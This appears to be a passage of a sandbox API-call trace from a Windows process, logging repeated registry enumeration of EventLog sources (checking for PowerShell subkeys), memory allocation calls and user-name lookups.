	[0398.218] CoTaskMemFree (pv=0x0) 
	[0398.218] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.218] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x8, lpName=0x2f4ad0, lpcchName=0x16d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.218] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.218] CoTaskMemFree (pv=0x0) 
	[0398.218] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x300) returned 0x0
	[0398.218] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x0) returned 0x2
	[0398.218] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x314) returned 0x0
	[0398.219] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x0) returned 0x2
	[0398.219] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x31c) returned 0x0
	[0398.219] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x0) returned 0x2
	[0398.219] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x320) returned 0x0
	[0398.219] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x0) returned 0x2
	[0398.219] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x324) returned 0x0
	[0398.219] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x0) returned 0x2
	[0398.219] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x328) returned 0x0
	[0398.219] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x0) returned 0x2
	[0398.219] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x32c) returned 0x0
	[0398.219] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x0) returned 0x2
	[0398.220] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x330) returned 0x0
	[0398.220] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x0) returned 0x2
	[0398.220] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x334) returned 0x0
	[0398.220] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x338) returned 0x0
	[0398.220] RegCloseKey (hKey=0x338) returned 0x0
	[0398.220] RegCloseKey (hKey=0x2fc) returned 0x0
	[0398.221] RegCloseKey (hKey=0x334) returned 0x0
	[0398.231] CoTaskMemAlloc (cb=0x804) returned 0x1b7f8350
	[0398.231] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f8350, nSize=0x16d848 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d848) returned 0x1
	[0398.584] CoTaskMemFree (pv=0x1b7f8350) 
	[0398.585] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.585] GetUserNameW (in: lpBuffer=0x2f4ad0, pcbBuffer=0x16d888 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d888) returned 1
	[0398.586] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d588 | out: phkResult=0x16d588*=0x320) returned 0x0
	[0399.027] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d4fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d4fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.027] CoTaskMemFree (pv=0x0) 
	[0399.027] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.027] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.027] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.027] CoTaskMemFree (pv=0x0) 
	[0399.027] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.027] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.027] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.027] CoTaskMemFree (pv=0x0) 
	[0399.027] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.027] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.028] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.028] CoTaskMemFree (pv=0x0) 
	[0399.028] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.028] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.028] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.028] CoTaskMemFree (pv=0x0) 
	[0399.028] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.028] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.028] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.028] CoTaskMemFree (pv=0x0) 
	[0399.028] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.028] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.028] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.028] CoTaskMemFree (pv=0x0) 
	[0399.028] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.028] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.028] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.028] CoTaskMemFree (pv=0x0) 
	[0399.028] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.028] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.028] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.028] CoTaskMemFree (pv=0x0) 
	[0399.028] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.029] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.029] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.029] CoTaskMemFree (pv=0x0) 
	[0399.029] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x324) returned 0x0
	[0399.029] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.029] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x328) returned 0x0
	[0399.029] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.029] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x32c) returned 0x0
	[0399.029] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.029] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x330) returned 0x0
	[0399.029] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.029] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x2f8) returned 0x0
	[0399.030] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.030] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x1c8) returned 0x0
	[0399.030] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.030] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x300) returned 0x0
	[0399.030] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.030] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x314) returned 0x0
	[0399.030] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.030] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x31c) returned 0x0
	[0399.030] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x33c) returned 0x0
	[0399.030] RegCloseKey (hKey=0x33c) returned 0x0
	[0399.030] RegCloseKey (hKey=0x320) returned 0x0
	[0399.031] RegCloseKey (hKey=0x31c) returned 0x0
	[0399.031] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d588 | out: phkResult=0x16d588*=0x31c) returned 0x0
	[0399.031] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d4fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d4fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.032] CoTaskMemFree (pv=0x0) 
	[0399.032] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.032] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x0, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.032] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.032] CoTaskMemFree (pv=0x0) 
	[0399.032] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.032] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x1, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.032] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.032] CoTaskMemFree (pv=0x0) 
	[0399.032] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.032] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x2, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.032] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.032] CoTaskMemFree (pv=0x0) 
	[0399.032] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.032] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x3, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.032] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.032] CoTaskMemFree (pv=0x0) 
	[0399.032] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.032] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x4, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.032] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.032] CoTaskMemFree (pv=0x0) 
	[0399.032] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.032] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x5, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.032] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.032] CoTaskMemFree (pv=0x0) 
	[0399.033] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.033] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x6, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.033] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.033] CoTaskMemFree (pv=0x0) 
	[0399.033] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.033] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x7, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.033] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.033] CoTaskMemFree (pv=0x0) 
	[0399.033] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.033] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x8, lpName=0x2f4ad0, lpcchName=0x16d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.033] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.033] CoTaskMemFree (pv=0x0) 
	[0399.033] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x320) returned 0x0
	[0399.033] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.033] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x33c) returned 0x0
	[0399.033] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.033] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x340) returned 0x0
	[0399.034] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.034] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x344) returned 0x0
	[0399.034] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.034] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x348) returned 0x0
	[0399.034] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.034] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x34c) returned 0x0
	[0399.034] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.034] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x350) returned 0x0
	[0399.034] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.034] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x354) returned 0x0
	[0399.034] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x0) returned 0x2
	[0399.035] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x358) returned 0x0
	[0399.035] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x35c) returned 0x0
	[0399.035] RegCloseKey (hKey=0x35c) returned 0x0
	[0399.035] RegCloseKey (hKey=0x31c) returned 0x0
	[0399.035] RegCloseKey (hKey=0x358) returned 0x0
	[0399.036] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d558 | out: phkResult=0x16d558*=0x358) returned 0x0
	[0399.036] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d4cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d4cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.037] CoTaskMemFree (pv=0x0) 
	[0399.037] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.037] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x2f4ad0, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.037] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.037] CoTaskMemFree (pv=0x0) 
	[0399.037] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.037] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x2f4ad0, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.037] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.037] CoTaskMemFree (pv=0x0) 
	[0399.037] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.037] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x2f4ad0, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.037] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.037] CoTaskMemFree (pv=0x0) 
	[0399.037] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.037] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x2f4ad0, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.037] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.037] CoTaskMemFree (pv=0x0) 
	[0399.037] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.037] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x2f4ad0, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.037] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.037] CoTaskMemFree (pv=0x0) 
	[0399.037] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.037] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x2f4ad0, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.038] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.038] CoTaskMemFree (pv=0x0) 
	[0399.038] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.038] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x2f4ad0, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.038] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.038] CoTaskMemFree (pv=0x0) 
	[0399.038] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.038] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x2f4ad0, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.038] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.038] CoTaskMemFree (pv=0x0) 
